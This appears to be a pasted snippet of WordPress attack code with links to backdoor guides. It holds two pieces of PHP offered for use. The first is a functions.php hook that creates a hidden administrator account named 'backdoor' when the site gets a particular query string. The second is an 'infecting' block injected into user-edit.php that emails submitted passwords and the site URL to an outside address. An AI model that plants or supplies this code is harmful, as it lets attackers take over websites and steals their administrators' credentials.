wp-add-user&infecting

1. https://doblercarranco.com/como-hacer-un-backdoor-en-wordpress/
2. https://josvermeulen.com/snippet/backdoor-in-wordpress/
3. https://forum.freecodecamp.org/t/php-backdoor-to-wp-complete-guide-to-whom-it-may/424398
4.  
5. place the code in the PHP section in your themes functions.php file and upload to your web server.
6. /?backdoor=crea
7.  
8. add_action( 'wp_head', 'my_backdoor' );
9. function my_backdoor() {
10.          if ($_GET['backdoor'] == 'crea') {
11.             require('wp-includes/registration.php');
12.             if (!username_exists('backdoor')) {
13.                    $user_id = wp_create_user('backdoor', 'my-password');
14.                    $user = new WP_User($user_id);
15.                    $user->set_role('administrator');
16.               echo 'Puerta trasera creada';
17.                  die();
18.             }
19.          }
20. }
21.  
22.  
23. ##############################################
24. # By     : xSecurity                         #
25. # Home   : www.sec4ever.com                  #
26. # Greets : b0x [ Zaid ]                      #
27. # Inject : /home/user/wp-admin/user-edit.php #
28. # Note   : Don't Forget Change Email :)      #
29. ##############################################
30.  
31. /**
32.  * start infecting
33.  */
34. if($_POST['submit'])
35.     {
36.     $mail = "[email protected]";
37.     $subj = "Information URL : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUSET_URI'];
38.     $mseg = "PASSWORD :" . $_POST['pass2'];
39.     $func = @mail($mail, $subj, $mseg);
40.     }
41. /**
42.  * end infecting
43.  */